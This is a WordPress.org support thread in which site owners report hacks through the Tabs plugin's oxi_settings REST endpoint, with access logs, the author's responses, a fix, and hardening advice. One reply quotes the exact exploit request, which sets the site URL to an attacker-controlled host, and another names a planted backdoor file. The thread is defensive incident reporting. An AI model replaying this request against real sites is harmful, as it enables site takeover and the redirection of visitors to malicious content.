Title: Security Checking
Last modified: December 9, 2021

---

# Security Checking

 *  Resolved [hangar1337](https://wordpress.org/support/users/hangar1337/)
 * (@hangar1337)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/)
 * Hi Oxilab Team,
 * Someone has succeed to change the account creation settings of one of my wordpress(
   Checkbox “Registration” and “Default role for any new account”) and then create
   an administrator account. It turns out that this person just before creating 
   the account called your API and only her with the POST method. Could you confirm
   to me that there is not a possible breach on your side?
 * Thanks a lot
 *     ```
       46.39.80.197 - - [09/Dec/2021:13:37:43 +0000] "POST /wp-json/oxilabtabsultimate/v1/oxi_settings HTTP/1.1" 200 543 "https://www.xxxxx.xxx:443/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3538.77 Safari/537.36"
       46.39.80.197 - - [09/Dec/2021:13:37:43 +0000] "POST /wp-json/oxilabtabsultimate/v1/oxi_settings HTTP/1.1" 200 543 "https://www.xxxxx.xxx:443/wp-json/oxilabtabsultimate/v1/oxi_settings" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3538.77 Safari/537.36"
       46.39.80.197 - - [09/Dec/2021:13:37:44 +0000] "GET /wp-login.php?action=register HTTP/1.1" 200 2055 "https://www.xxxxx.xxx:443/wp-json/oxilabtabsultimate/v1/oxi_settings" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3538.77 Safari/537.36"
       46.39.80.197 - - [09/Dec/2021:13:37:45 +0000] "POST /wp-login.php?action=register HTTP/1.1" 302 442 "https://www.xxxxx.xxx:443/wp-login.php?action=register" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3538.77 Safari/537.36"
       46.39.80.197 - - [09/Dec/2021:13:37:47 +0000] "GET /wp-login.php?checkemail=registered HTTP/1.1" 302 224 "https://www.xxxxx.xxx:443/wp-login.php?action=register" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3538.77 Safari/537.36"
       46.39.80.197 - - [09/Dec/2021:13:37:47 +0000] "GET /not_found HTTP/1.1" 404 67873 "https://www.xxxxx.xxx:443/wp-login.php?action=register" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3538.77 Safari/537.36"
       ```
   

Viewing 9 replies - 1 through 9 (of 9 total)

 *  Plugin Author [biplob018](https://wordpress.org/support/users/biplob018/)
 * (@biplob018)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15148336)
 * As you mention code, Those can’t work with my plugin. I always use security with
   any post or get request.
 * someone tried into your website as they submit some requests with my plugins 
   also. but those can’t pass WordPress nonce at rest API.
 *  Thread Starter [hangar1337](https://wordpress.org/support/users/hangar1337/)
 * (@hangar1337)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15148381)
 * Thanks for the quick fix ! 🙂
 *  Thread Starter [hangar1337](https://wordpress.org/support/users/hangar1337/)
 * (@hangar1337)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15148525)
 * If I understand you, the release of 3.5.4 version with the following correction
   1 hour ago is therefore unrelated …
 * [https://github.com/MrOxizen/vc-tabs/commit/60fb94d46579f923436e5b8fbf2ba9044835dc24#diff-c862cc5aaff4434be8071dcede9d73ec1f8138d168e74f66805a04bf92160122](https://github.com/MrOxizen/vc-tabs/commit/60fb94d46579f923436e5b8fbf2ba9044835dc24#diff-c862cc5aaff4434be8071dcede9d73ec1f8138d168e74f66805a04bf92160122)
 * The fix is however on WordPress nonce. It’s not fair.
 *  Plugin Author [biplob018](https://wordpress.org/support/users/biplob018/)
 * (@biplob018)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15148566)
 * Before this update, I use a header nonce with a header request. for more stable
   I add an ajax format to make it more stable.
 * Thank You very much to share the issues as I can make my plugin more stable. 
   I am just concerned about my plugin not hitting you at all. hope you understand.
    -  This reply was modified 4 years, 5 months ago by [t-p](https://wordpress.org/support/users/t-p/).
    -  This reply was modified 4 years, 5 months ago by [biplob018](https://wordpress.org/support/users/biplob018/).
 *  [itsec007](https://wordpress.org/support/users/itsec007/)
 * (@itsec007)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15156072)
 * Hi
 * I was also hacked through this path, registered an admin account and loaded the
   plugin as a backdoor.
 * [@biplob018](https://wordpress.org/support/users/biplob018/)
    Which plugin is
   using the path /wp-json/oxilabtabsultimate/v1/oxi_settings? Only plugin “Tabs–
   Responsive Tabs with WooCommerce”?
 * [@hangar1337](https://wordpress.org/support/users/hangar1337/)
    Check your server
   for wp-cache.php file. This is a loaded backdoor.
 *  Thread Starter [hangar1337](https://wordpress.org/support/users/hangar1337/)
 * (@hangar1337)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15158260)
 * Hi [@itsec007](https://wordpress.org/support/users/itsec007/)
 * Thanks for your sharing. I am using docker and composer to build the wordpress.
   I rebuilt and redeployed new image after the fix. I found some information about
   async actions with “Action Scheduler” on database. It should be seriously considered
   that the database has been copied…
 *  [Antony Booker](https://wordpress.org/support/users/antonynz/)
 * (@antonynz)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15178796)
 * [@biplob018](https://wordpress.org/support/users/biplob018/) Thanks for patching
   this quickly.
 * I noticed there are some capability checks in the permission_callback added to
   deal with this that I’d recommend reworking.
 * The plugin now has an option for changing the role of the user that has permission
   to edit the plugin’s settings. However the get_permissions_check function grants
   permissions based on the first key in the capability array for the role rather
   than against the user role selected in the plugin options.
 * The original vulnerability would still be possible for any user with the same
   capability. For example if shop manager was chosen as a role that could update
   the plugin’s settings, they would be able to update any admin options and potentially
   gain admin access.
 * I’d recommend changing the get_permissions_check to check for the manage_options
   capability only, so only admins can update the settings. For further protection
   you could whitelist/hardcode the options that are updated.
 * I’d also check any input fields used by the plugin are escaping data before outputting
   it to the user to prevent XSS attacks.
    -  This reply was modified 4 years, 5 months ago by [Antony Booker](https://wordpress.org/support/users/antonynz/).
 *  [tigertech](https://wordpress.org/support/users/tigertech/)
 * (@tigertech)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15181804)
 * Just as a followup to this, I work for a hosting company, and one of our customer
   sites was also hacked via this vulnerability yesterday. We use mod_security logging
   for forensics, so I can tell you the exact request used to do it:
 * `POST /wp-json//oxilabtabsultimate/v1/oxi_settings HTTP/1.1`
 * Post data:
 * `rawdata={"name":"siteurl","value":"https://line.storerightdesicion.com/ping/?
   track.js"}`
 * Hopefully that helps you (the author) ensure that the vulnerability is patched.
 *  [revivalyth](https://wordpress.org/support/users/revivalyth/)
 * (@revivalyth)
 * [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15182241)
 * [@biplob018](https://wordpress.org/support/users/biplob018/) A few of our clients
   that use this plugin were affected today. Same issue [@tigertech](https://wordpress.org/support/users/tigertech/)
   mentioned.
    -  This reply was modified 4 years, 5 months ago by [revivalyth](https://wordpress.org/support/users/revivalyth/).
    -  This reply was modified 4 years, 5 months ago by [revivalyth](https://wordpress.org/support/users/revivalyth/).

Viewing 9 replies - 1 through 9 (of 9 total)

The topic ‘Security Checking’ is closed to new replies.

 * ![](https://s.w.org/plugins/geopattern-icon/vc-tabs_8987a1.svg)
 * [Tabs – Responsive Tabs with WooCommerce Product Tab Extension](https://wordpress.org/plugins/vc-tabs/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/vc-tabs/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/vc-tabs/)
 * [Active Topics](https://wordpress.org/support/plugin/vc-tabs/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/vc-tabs/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/vc-tabs/reviews/)

 * 10 replies
 * 6 participants
 * Last reply from: [revivalyth](https://wordpress.org/support/users/revivalyth/)
 * Last activity: [4 years, 5 months ago](https://wordpress.org/support/topic/security-checking/#post-15182241)
 * Status: resolved